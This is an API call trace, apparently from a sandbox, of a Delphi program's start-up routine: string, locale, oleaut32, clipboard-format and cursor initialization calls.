[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffd3, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffd0, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffd7, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffd6, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe8, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe9, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffea, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe7, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe5, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe3, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe2, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe1, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffe0, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xffff, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfffe, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfffd, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfffc, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfffb, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfffa, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfff9, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfff8, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0179.647] LoadStringA (in: hInstance=0x2950000, uID=0xfff7, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0179.648] LoadStringA (in: hInstance=0x2950000, uID=0xfff6, lpBuffer=0x20f170, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0179.648] LoadStringA (in: hInstance=0x2950000, uID=0xfff4, lpBuffer=0x20f15c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0179.648] LoadStringA (in: hInstance=0x2950000, uID=0xffe4, lpBuffer=0x20f15c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0179.648] GetVersionExA (in: lpVersionInformation=0x20f4f4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2950000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x95\x02·\"\x95\x02\x8cõ ") | out: lpVersionInformation=0x20f4f4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0179.648] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.648] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0179.648] GetThreadLocale () returned 0x409
[0179.648] GetThreadLocale () returned 0x409
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Jan") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="January") returned 8
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Feb") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="February") returned 9
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Mar") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="March") returned 6
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Apr") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="April") returned 6
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="May") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="May") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Jun") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="June") returned 5
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Jul") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="July") returned 5
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Aug") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="August") returned 7
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Sep") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="September") returned 10
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Oct") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="October") returned 8
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Nov") returned 4
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="November") returned 9
[0179.648] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Dec") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="December") returned 9
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Sun") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Sunday") returned 7
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Mon") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Monday") returned 7
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Tue") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Tuesday") returned 8
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Wed") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Wednesday") returned 10
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Thu") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Thursday") returned 9
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Fri") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Friday") returned 7
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Sat") returned 4
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x20f3cc, cchData=256 | out: lpLCData="Saturday") returned 9
[0179.649] GetThreadLocale () returned 0x409
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x20f428, cchData=256 | out: lpLCData="$") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x20f428, cchData=256 | out: lpLCData="0") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x20f428, cchData=256 | out: lpLCData="0") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x20f520, cchData=2 | out: lpLCData=",") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x20f520, cchData=2 | out: lpLCData=".") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x20f428, cchData=256 | out: lpLCData="2") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x20f520, cchData=2 | out: lpLCData="/") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x20f428, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0179.649] GetThreadLocale () returned 0x409
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x20f3f4, cchData=256 | out: lpLCData="1") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x20f428, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0179.649] GetThreadLocale () returned 0x409
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x20f3f4, cchData=256 | out: lpLCData="1") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x20f520, cchData=2 | out: lpLCData=":") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x20f428, cchData=256 | out: lpLCData="AM") returned 3
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x20f428, cchData=256 | out: lpLCData="PM") returned 3
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x20f428, cchData=256 | out: lpLCData="0") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x20f428, cchData=256 | out: lpLCData="0") returned 2
[0179.649] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x20f428, cchData=256 | out: lpLCData="0") returned 2
[0179.650] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x20f520, cchData=2 | out: lpLCData=",") returned 2
[0179.650] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0179.650] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0179.651] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0179.651] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0179.651] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0179.651] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0179.652] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0179.652] GetDC (hWnd=0x0) returned 0xed010836
[0179.652] GetDeviceCaps (hdc=0xed010836, index=90) returned 96
[0179.652] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0179.652] GetDC (hWnd=0x0) returned 0xed010836
[0179.652] GetDeviceCaps (hdc=0xed010836, index=104) returned 0
[0179.652] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0179.652] CreatePalette (plpal=0x20f184) returned 0x61080861
[0179.652] GetStockObject (i=7) returned 0x1b00017
[0179.652] GetStockObject (i=5) returned 0x1900015
[0179.652] GetStockObject (i=13) returned 0x18a002e
[0179.652] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0179.652] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0179.652] LoadStringA (in: hInstance=0x2950000, uID=0xff3d, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0179.652] LoadStringA (in: hInstance=0x2950000, uID=0xff3c, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0179.652] LoadStringA (in: hInstance=0x2950000, uID=0xff3b, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0179.652] LoadStringA (in: hInstance=0x2950000, uID=0xff3a, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0179.652] LoadStringA (in: hInstance=0x2950000, uID=0xff39, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0179.652] LoadStringA (in: hInstance=0x2950000, uID=0xff38, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff37, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff36, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff35, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff34, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff33, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff32, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff31, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff30, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff4f, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff4e, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff4d, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xff4c, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0179.653] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0179.653] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0179.653] GetCurrentThreadId () returned 0x3d8
[0179.653] GlobalAddAtomA (lpString="WndProcPtr02950000000003D8") returned 0xc0ff
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xfefc, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xfefb, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xfefa, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xfef9, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0179.653] LoadStringA (in: hInstance=0x2950000, uID=0xfef8, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef7, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef6, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef5, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef4, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef3, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef2, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef1, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xfef0, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff0f, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff0e, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff0d, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff0c, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff0b, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff0a, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff09, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff08, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff07, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff06, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff05, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff04, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff03, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff02, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff01, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff00, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff1f, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff1e, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff1d, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff1c, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff1b, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff1a, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff19, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff18, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff17, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff16, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0179.654] LoadStringA (in: hInstance=0x2950000, uID=0xff15, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff14, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff13, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff12, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff11, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff10, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff2f, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0179.655] LoadStringA (in: hInstance=0x2950000, uID=0xff2e, lpBuffer=0x20f180, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0179.655] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0179.655] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0179.655] GetVersion () returned 0x1db10106
[0179.655] GetCurrentProcessId () returned 0x5cc
[0179.655] GlobalAddAtomA (lpString="Delphi000005CC") returned 0xc105
[0179.655] GetCurrentThreadId () returned 0x3d8
[0179.655] GlobalAddAtomA (lpString="ControlOfs02950000000003D8") returned 0xc0fe
[0179.655] RegisterClipboardFormatA (lpszFormat="ControlOfs02950000000003D8") returned 0xc184
[0179.655] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0179.655] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0179.655] GetSystemMetrics (nIndex=19) returned 1
[0179.655] GetSystemMetrics (nIndex=75) returned 1
[0179.655] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a71320, fWinIni=0x0 | out: pvParam=0x2a71320) returned 1
[0179.655] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0179.655] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0179.655] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ff9) returned 0xc01b1
[0179.656] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0179.656] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0179.656] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0179.656] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffa) returned 0xb01af
[0179.656] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffb) returned 0xc0145
[0179.656] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffc) returned 0x110135
[0179.656] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffd) returned 0x6011f
[0179.656] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7fff) returned 0x190105
[0179.657] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffe) returned 0xc01b3
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
